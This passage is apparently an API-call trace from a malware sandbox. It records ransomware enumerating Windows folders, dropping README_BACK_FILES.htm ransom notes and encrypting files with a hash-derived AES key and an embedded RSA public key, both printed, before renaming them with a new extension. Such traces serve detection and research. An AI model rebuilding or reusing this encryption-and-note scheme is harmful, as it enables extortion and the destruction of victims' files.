hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0238.713] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0 [0238.713] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0238.713] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\readme_back_files.htm")) returned 0x20 [0238.714] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0238.714] FindFirstFileA (in: lpFileName="C:\\\\Recovery\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0xffffffff [0238.714] GetFileAttributesA (lpFileName="C:\\\\Recovery\\README_BACK_FILES.htm" (normalized: "c:\\recovery\\readme_back_files.htm")) returned 0xffffffff [0238.714] AreFileApisANSI () returned 1 [0238.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39bf00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0238.715] CreateFileW (lpFileName="C:\\\\Recovery\\README_BACK_FILES.htm" (normalized: "c:\\recovery\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.715] GetLastError () returned 0x5 [0238.715] GetLastError () returned 0x5 [0238.715] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0238.715] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9fb44 | out: lpSystemTimeAsFileTime=0x2b9fb44) [0238.715] GetLastError () returned 0x5 [0238.715] GetFileAttributesA (lpFileName="C:\\\\swapfile.sys" (normalized: "c:\\swapfile.sys")) returned 0xffffffff [0238.715] SetFileAttributesA (lpFileName="C:\\\\swapfile.sys", dwFileAttributes=0x80) returned 0 [0238.716] CreateFileA (lpFileName="C:\\\\swapfile.sys" (normalized: "c:\\swapfile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.716] CreateFileA (lpFileName="C:\\\\swapfile.sys.gsg" (normalized: "c:\\swapfile.sys.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.716] SetFileAttributesA (lpFileName="C:\\\\swapfile.sys.gsg", dwFileAttributes=0x2) returned 0 [0238.716] CryptAcquireContextA (in: phProv=0x2b9eb40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9eb40*=0x287fb98) returned 1 [0238.719] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9eb44 | out: phHash=0x2b9eb44) returned 1 [0238.719] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.719] CryptHashData (hHash=0x282e238, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.719] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e238, dwFlags=0x1000000, phKey=0x2b9eb30 | out: phKey=0x2b9eb30*=0x282ddf8) returned 1 [0238.719] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9eb4c, pcbBinary=0x2b9eb2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.719] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9eb4c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28 | out: pvStructInfo=0x2b9eb20, pcbStructInfo=0x2b9eb28) returned 1 [0238.719] CryptAcquireContextA (in: phProv=0x2b9eb3c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9eb3c*=0x28811e8) returned 1 [0238.720] CryptImportPublicKeyInfo (in: hCryptProv=0x28811e8, dwCertEncodingType=0x1, pInfo=0x286aa48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286aa78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286aa80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9eb34 | out: phKey=0x2b9eb34*=0x282dff8) returned 1 [0238.720] CryptEncrypt (in: hKey=0x282dff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9eb24*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9eb24*=0x80) returned 1 [0238.720] CryptEncrypt (in: hKey=0x282dff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881270*, pdwDataLen=0x2b9eb38*=0x18, dwBufLen=0x80 | out: pbData=0x2881270*, pdwDataLen=0x2b9eb38*=0x80) returned 1 [0238.720] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881270, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0238.720] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9eb48, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9eb48*=0x0, lpOverlapped=0x0) returned 0 [0238.720] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9eb48*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9eb48*=0x10) returned 1 [0238.720] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9eb48, lpOverlapped=0x0) returned 0 [0238.720] CloseHandle (hObject=0xffffffff) returned 1 [0238.720] CloseHandle (hObject=0xffffffff) returned 1 [0238.720] CopyFileA (lpExistingFileName="C:\\\\swapfile.sys.gsg" (normalized: "c:\\swapfile.sys.gsg"), lpNewFileName="C:\\\\swapfile.sys" (normalized: "c:\\swapfile.sys"), bFailIfExists=0) returned 0 [0238.720] SetFileAttributesA (lpFileName="C:\\\\swapfile.sys", dwFileAttributes=0xfffff7cc) returned 0 [0238.721] DeleteFileA (lpFileName="C:\\\\swapfile.sys.gsg" (normalized: "c:\\swapfile.sys.gsg")) returned 0 [0238.721] MoveFileA (lpExistingFileName="C:\\\\swapfile.sys" (normalized: "c:\\swapfile.sys"), lpNewFileName="C:\\\\swapfile.sys.fuck" (normalized: "c:\\swapfile.sys.fuck")) returned 0 [0238.721] CryptDestroyHash (hHash=0x282e238) returned 1 [0238.721] CryptDestroyKey (hKey=0x282ddf8) returned 1 [0238.721] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.721] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0238.721] FindFirstFileA (in: lpFileName="C:\\\\System Volume Information\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0xffffffff [0238.722] GetFileAttributesA (lpFileName="C:\\\\System Volume Information\\README_BACK_FILES.htm" (normalized: "c:\\system volume information\\readme_back_files.htm")) returned 0xffffffff [0238.722] AreFileApisANSI () returned 1 [0238.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd4a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0238.722] CreateFileW (lpFileName="C:\\\\System Volume Information\\README_BACK_FILES.htm" (normalized: "c:\\system volume information\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.722] GetLastError () returned 0x5 [0238.722] GetLastError () returned 0x5 [0238.722] FindNextFileA (in: hFindFile=0x394aa8, lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 1 [0238.722] FindFirstFileA (in: lpFileName="C:\\\\Users\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0x282ddf8 [0238.722] FindNextFileA (in: hFindFile=0x282ddf8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.723] FindNextFileA (in: hFindFile=0x282ddf8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x282e3b8 [0238.723] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.723] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x282e338 [0238.723] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.723] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x282de78 [0238.723] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.723] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_15.007.20033\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e078 [0238.724] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.724] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.725] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.725] FindClose (in: hFindFile=0x282e078 | out: hFindFile=0x282e078) returned 1 [0238.725] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_15.007.20033\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_15.007.20033\\readme_back_files.htm")) returned 0x20 [0238.725] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.725] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_15.023.20070\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e3f8 [0238.727] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.727] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.727] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.727] FindClose (in: hFindFile=0x282e3f8 | out: hFindFile=0x282e3f8) returned 1 [0238.727] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_15.023.20070\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_15.023.20070\\readme_back_files.htm")) returned 0x20 [0238.730] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.730] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_17.009.20058\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e3f8 [0238.731] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.731] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.731] FindNextFileA (in: hFindFile=0x282e3f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.731] FindClose (in: hFindFile=0x282e3f8 | out: hFindFile=0x282e3f8) returned 1 [0238.731] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_17.009.20058\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_17.009.20058\\readme_back_files.htm")) returned 0x20 [0238.732] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.732] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_17.012.20098\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282e078 [0238.732] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.732] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.732] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.732] FindNextFileA (in: hFindFile=0x282e078, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.732] FindClose (in: hFindFile=0x282e078 | out: hFindFile=0x282e078) returned 1 [0238.732] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_17.012.20098\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_17.012.20098\\readme_back_files.htm")) returned 0x20 [0238.732] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.732] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.733] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\S\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282deb8 [0238.733] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.733] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.733] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.733] FindClose (in: hFindFile=0x282deb8 | out: hFindFile=0x282deb8) returned 1 [0238.733] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\S\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\s\\readme_back_files.htm")) returned 0x20 [0238.733] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.733] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282dfb8 [0238.734] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.734] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.734] FindNextFileA (in: hFindFile=0x282dfb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.734] FindClose (in: hFindFile=0x282dfb8 | out: hFindFile=0x282dfb8) returned 1 [0238.734] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\{291aa914-a987-4ce9-bd63-ac0a92d435e5}\\readme_back_files.htm")) returned 0x20 [0238.735] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.735] FindClose (in: hFindFile=0x282de78 | out: hFindFile=0x282de78) returned 1 [0238.735] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\arm\\readme_back_files.htm")) returned 0x20 [0238.735] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.735] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.735] FindClose (in: hFindFile=0x282e338 | out: hFindFile=0x282e338) returned 1 [0238.735] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Adobe\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\adobe\\readme_back_files.htm")) returned 0x20 [0238.735] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.735] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Application Data\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0238.736] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Application Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\application data\\readme_back_files.htm")) returned 0x20 [0238.736] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.736] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Comms\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x282e338 [0238.736] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.736] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.736] FindNextFileA (in: hFindFile=0x282e338, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.736] FindClose (in: hFindFile=0x282e338 | out: hFindFile=0x282e338) returned 1 [0238.736] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Comms\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\comms\\readme_back_files.htm")) returned 0x20 [0238.736] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.737] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Desktop\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0238.737] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Desktop\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\desktop\\readme_back_files.htm")) returned 0xffffffff [0238.737] AreFileApisANSI () returned 1 [0238.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0238.737] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Desktop\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\desktop\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.738] GetLastError () returned 0x5 [0238.738] GetLastError () returned 0x5 [0238.738] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.738] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Documents\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0238.738] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Documents\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\documents\\readme_back_files.htm")) returned 0x20 [0238.738] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.738] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x282df78 [0238.738] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.738] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.739] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x282de78 [0238.739] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.739] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.739] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x282deb8 [0238.739] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.739] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.739] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x282e178 [0238.740] FindNextFileA (in: hFindFile=0x282e178, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.740] FindNextFileA (in: hFindFile=0x282e178, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.740] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.740] GetLastError () returned 0x5 [0238.740] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0238.740] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0238.741] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.741] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.742] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.742] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2880c98) returned 1 [0238.745] CryptCreateHash (in: hProv=0x2880c98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.745] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.745] CryptHashData (hHash=0x282dfb8, pbData=0x276da40, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.745] CryptDeriveKey (in: hProv=0x2880c98, Algid=0x6610, hBaseData=0x282dfb8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e478) returned 1 [0238.745] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.745] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.745] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28812f8) returned 1 [0238.746] CryptImportPublicKeyInfo (in: hCryptProv=0x28812f8, dwCertEncodingType=0x1, pInfo=0x286ab18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286ab48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286ab50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e0b8) returned 1 [0238.746] CryptEncrypt (in: hKey=0x282e0b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 